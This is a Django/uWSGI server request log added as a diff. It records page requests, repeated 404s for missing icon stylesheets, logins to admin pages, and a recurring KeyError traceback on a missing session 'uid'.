+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 346/454] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 347/455] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 348/456] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 349/457] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 350/458] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:12 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 351/459] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:55:13 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 352/460] 219.228.146.146 () {40 vars in 907 bytes} [Thu Jan 14 07:55:14 2021] GET /announcement/ => generated 8247 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 353/461] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 354/462] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 355/463] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 356/464] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 357/465] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 358/466] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 359/467] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:14 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 360/468] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:14 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 361/469] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:14 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 2069|app: 0|req: 362/470] 42.236.10.117 () {38 vars in 845 bytes} [Thu Jan 14 07:55:14 2021] GET /home/ => generated 58375 bytes in 64 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 363/471] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:55:17 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 364/472] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 365/473] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 366/474] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 367/475] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 368/476] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 369/477] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 370/478] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 371/479] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 372/480] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:17 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 373/481] 42.236.10.78 () {34 vars in 792 bytes} [Thu Jan 14 07:55:17 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 374/482] 219.228.146.146 () {40 vars in 903 bytes} [Thu Jan 14 07:55:19 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 375/483] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 376/484] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 377/485] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 378/486] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 379/487] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 380/488] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 25 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 381/489] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 382/490] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 383/491] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:19 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 384/492] 42.236.10.84 () {40 vars in 878 bytes} [Thu Jan 14 07:55:24 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[]
+[pid: 2069|app: 0|req: 385/493] 219.228.146.146 () {40 vars in 898 bytes} [Thu Jan 14 07:55:25 2021] GET /all-1-0-0 => generated 8287 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 386/494] 42.236.10.78 () {38 vars in 847 bytes} [Thu Jan 14 07:55:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 387/495] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:55:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 388/496] 42.236.10.117 () {34 vars in 791 bytes} [Thu Jan 14 07:55:30 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/497] 42.236.10.78 () {40 vars in 942 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/498] 42.236.10.75 () {40 vars in 919 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/499] 42.236.10.75 () {40 vars in 923 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/500] 42.236.10.78 () {40 vars in 922 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/501] 42.236.10.93 () {40 vars in 927 bytes} [Thu Jan 14 07:55:31 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/502] 42.236.10.75 () {40 vars in 903 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/503] 42.236.10.78 () {40 vars in 901 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/504] 42.236.10.78 () {40 vars in 919 bytes} [Thu Jan 14 07:55:31 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/505] 42.236.10.75 () {40 vars in 916 bytes} [Thu Jan 14 07:55:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/506] 42.236.10.75 () {40 vars in 908 bytes} [Thu Jan 14 07:55:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 389/507] 42.236.10.117 () {40 vars in 877 bytes} [Thu Jan 14 07:55:33 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 390/508] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:55:33 2021] POST /login/ => generated 27 bytes in 28 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 391/509] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:55:33 2021] GET /home/ => generated 7943 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/510] 42.236.10.84 () {40 vars in 963 bytes} [Thu Jan 14 07:55:35 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/511] 42.236.10.78 () {40 vars in 968 bytes} [Thu Jan 14 07:55:35 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 2069|app: 0|req: 392/512] 42.236.10.117 () {38 vars in 845 bytes} [Thu Jan 14 07:55:35 2021] GET /home/ => generated 58375 bytes in 69 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/513] 42.236.10.75 () {28 vars in 447 bytes} [Thu Jan 14 07:55:39 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: 0|req: 393/514] 114.87.230.234 () {40 vars in 919 bytes} [Thu Jan 14 07:55:55 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 2069|app: 0|req: 394/515] 114.87.230.234 () {38 vars in 807 bytes} [Thu Jan 14 07:55:55 2021] GET /favicon.ico => generated 3480 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 395/516] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:55:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 396/517] 114.87.230.234 () {48 vars in 1017 bytes} [Thu Jan 14 07:56:00 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 397/518] 114.87.230.234 () {40 vars in 927 bytes} [Thu Jan 14 07:56:00 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 398/519] 114.87.230.234 () {38 vars in 897 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 399/520] 114.87.230.234 () {38 vars in 885 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 400/521] 114.87.230.234 () {38 vars in 853 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 401/522] 114.87.230.234 () {38 vars in 873 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 402/523] 114.87.230.234 () {38 vars in 889 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 403/524] 114.87.230.234 () {38 vars in 873 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 404/525] 114.87.230.234 () {38 vars in 929 bytes} [Thu Jan 14 07:56:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 405/526] 114.87.230.234 () {38 vars in 821 bytes} [Thu Jan 14 07:56:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 406/527] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:56:05 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 407/528] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:56:05 2021] GET /home/ => generated 7946 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 408/529] 219.228.146.146 () {38 vars in 836 bytes} [Thu Jan 14 07:56:16 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 409/530] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:56:18 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 410/531] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:56:27 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 411/532] 219.228.146.146 () {40 vars in 897 bytes} [Thu Jan 14 07:56:27 2021] GET /admin-home/ => generated 6515 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 412/533] 219.228.146.146 () {38 vars in 844 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 413/534] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 414/535] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 416/536] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 417/537] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 417/538] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:56:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 418/539] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:28 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 419/540] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:28 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 420/541] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:56:28 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 421/542] 219.228.146.146 () {40 vars in 902 bytes} [Thu Jan 14 07:56:30 2021] GET /kind-manage/ => generated 8286 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 422/543] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 423/544] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 425/545] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 426/546] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 427/547] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 427/548] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:56:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
